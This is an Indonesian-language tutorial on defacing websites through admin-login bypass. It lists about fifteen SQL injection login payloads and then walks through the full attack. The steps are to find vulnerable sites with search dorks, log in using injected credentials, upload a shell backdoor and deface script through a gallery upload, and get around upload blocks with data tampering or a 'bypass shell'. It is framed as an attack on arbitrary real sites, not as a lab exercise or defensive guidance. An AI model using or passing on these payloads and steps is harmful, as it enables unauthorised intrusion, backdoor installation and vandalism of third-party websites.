Cara deface website Bypass admin 2022
Bypass Admin Login~ Sebenarnya ini tidak jauh berbeda dan masih berhubungan dengan SQL Injection. Jika kita ketahui, bug ini memungkinkan seorang attacker untuk masuk sebagai admin hanya dengan memasukan username dan password contoh seperti or 1=1 tanpa harus repot-repot seperti halnya melakukan ekploitasi website
Payload Bypass Admin
Dari sekian banyak query yang bertebaran di internet, disini saya akan membagikan beberapa query yang sering saya gunakan untuk bypass admin login website, diantaranya sebagai berikut:
admin' #
admin' or '1'='1
admin' or '1'='1'#
admin' or 1=1 or ''='
'or 1=1 limit 1 -- -+
' or '1'='1
' or 'x'='x
' or 0=0 --
' or 0=0 #
' or 1=1--
' or 'one'='one
'or 1=1-- -
'or''='
' or "a"="a" #
Dork Bypas admin
Untuk Dork Bypas admin klik Disini
Bahan Eksekusi
- Shell backdoor ,jika tidak punya Shell backdoor bisa download di sini
- Script deface
Tutorial :
Pertama2 kalian dorking terlebih dahulu dari dork diatas / dork lain juga bisa lalu pilih salah satu web dan masukan username dan password seperti berikut :
username : '=''or'
password : '=''or'
Untuk user dan password bisa menggunakan paylod lainya.
Jika vuln maka akan langsung masuk ke dashboard / halaman admin.
Jika kalian ingin mengupload shell backdoor/script deface, kali bisa upload di bagian gallery / bagian untuk upload file lainnya.
Disini saya terkena forbidden saat upload shell
Disini kalian bisa menggunakan cara Tamper data / menggunakan bypas Shell ,jika tidak punya Shell bypas bisa download disini
Untuk cara tamper data Via android klik Disini





